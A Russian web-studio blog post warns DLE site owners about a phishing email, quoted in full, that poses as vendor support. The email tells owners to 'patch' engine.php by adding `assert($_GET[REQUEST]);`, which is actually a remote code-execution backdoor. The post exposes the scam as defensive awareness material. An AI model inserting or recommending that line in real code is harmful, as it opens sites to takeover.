Ваш сайт подвержен взлому! - Взлом сайтов на DLE руками владельцев


Социальная инженерия, с помощью которой в последнюю неделю пытаются взломать сайты, созданные на движке DataLife Engine, работает грубо и не прикрыто (как лесть). Тем, более, что сам DLE, имеющий очень низкий порог вхождения для управления сайтом, этому всячески способствует - любая блондинка может поставить себе DLE и вести свой бложик. А то, что багфиксы ВСЕГДА есть на официальном сайте поддержки такие пользователи просто не в курсе.

Если вам через форму обратной связи на вашем сайте прилетело письмо такого содержания:


От: вашсайт.ru
К: mainl@вашсайт.ru
А также к:
Время создания: Wed, 15 Oct 2014 21:42:17 +0400
Тема: Ваш сайт вашсайт.ru подвержен взлому!
Прикрепленные файлы:

Админ., *****

Данное письмо вам отправил support@dle-news.ru с сайта http://вашсайт.ru

------------------------------------------------
Текст сообщения
------------------------------------------------

Здравствуйте, уважаемый клиент!

Благодарим Вас за использование на Вашем сайте http://вашсайт.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: http://вашсайт.ru/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);


С уважением,

Служба поддержки «DataLife Engine»

IP адрес отправителя: 162.244.33.213

------------------------------------------------
Помните, что администрация сайта не несет ответственности за содержание данного письма

С уважением,

Администрация http://вашсайт.ru



Вместо http://вашсайт.ru всегда подставляется имя вашего домена.
Что любопытно, такие письма прилетают официальным покупателям движка на сайте разработчиков.
Служба поддержки DLE-news.ru дала следующий комментарий о подобным письмах.

Это мошенники. Это письмо пришло не от нас и не от нашего домена. А просто было отправлено вам с вашего же сайта через обратную связь. Мы никогда не ходим по обратной связи чужих сайтов для уведомления о выходах патчей безопасности, потому как у нас есть прямые E-Mail адреса клиентов, которые указаны в вашем профиле на нашем сайте. И если и выходят патчи безопасности, то мы отправляем уведомления всегда напрямую с нашего сервера, и с указанием соответствующей публикации на нашем сайте с тем или иным патчем.

Все патчи публикуются только на странице http://dle-news.ru/bags/ и ставить нужно патчи только с официального сайта. А это распространение вируса.


Надеюсь, все владельцы сайтов на DataLife Engine примут даную информацию к сведению.

PS:
Социальная инженерия — метод несанкционированного доступа к информационным ресурсам, основанный на особенностях психологии человека. Основной целью социальных инженеров, как и других хакеров и взломщиков, является получение доступа к защищенным системам с целью кражи информации, паролей, данных о кредитных картах и т.п.

Основным отличием от стандартной кибер-атаки является то, что в данном случае в роли объекта атаки выбирается не машина, а ее оператор. Именно поэтому все методы и техники социальных инженеров основываются на использовании слабостей человеческого фактора, что считается крайне разрушительным, так как злоумышленник получает информацию, например, с помощью обычного телефонного разговора или путем проникновения в организацию под видом ее служащего.

Для защиты от атак данного вида следует знать о наиболее распространенных видах мошенничества, понимать, что на самом деле хотят взломщики и своевременно организовывать подходящую политику безопасности.


Уважаемые посетители,
Если Вы хотите оставить заказ на разработку сайта или получить предварительную консультацию воспользуйтесь формой по ссылке ниже.
Обратная связь
Наш специалист ответит вам в течении суток.



Похожие публикации

alarm2b.ru - корпоративный сайт для автохолдинга "Аларм Моторс"

Новый корпоративный сайт, разработку которого наша студия завершила в очень сжатые сроки (чтобы успеть к 1 сентября 2014 года), заказчик перенес к себе и нашими силами стал его активно наполнять... читать далее

OpenID Mod авторизации для DLE

ОБНОВЛЕНИЕ! Представляем вам долгожданный модуль OpenID авторизации на сайтах работающих на движке DataLife Engine. Модуль использует Loginza.API, позволяет авторизироваться с помощью следующих... читать далее

Форма быстрой связи с администрацией сайта для клиентов

Великолепная вебпрога позволяющая разместить на вашем сайте панель с чатом для ваших клиентов сообщения которого будут прилетать в ваш джаббер клиент Написать подробную инструкцию меня сподвигнула... читать далее

Услуги и расценки

TCSE-CMS с 2006 года занимается разработкой, созданием, поддержкой и продвижением сайтов различной тематики. Все проекты создаются на базе CMS (системы управления контентом, иначе – движке сайта) ... читать далее

Captcha как на Яндекс для комментариев на движке DLE

Как мы и обещали, продолжаем публикацию новейщих, а так же уже проверенных временем способов по защите от спам-ботов гадящих в камментах на сайтах работающих с помощью скрипта DLE. Модифицированная... читать далее

Разработка сайта - аренда автомобилей

TCSE-Studio закончила разработку сайта компании АвтоРент.СУ - аренда автомобилей без водителя в Санкт-Петербурге. Сайт реализован на качественном новостном движке, имеет продуманную форму обратной... читать далее

Прокомментировать


@

  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent

Архив сайта

Реклама на сайте Большой мастер насос дренажный grundfos unilift cvio.spb.ru.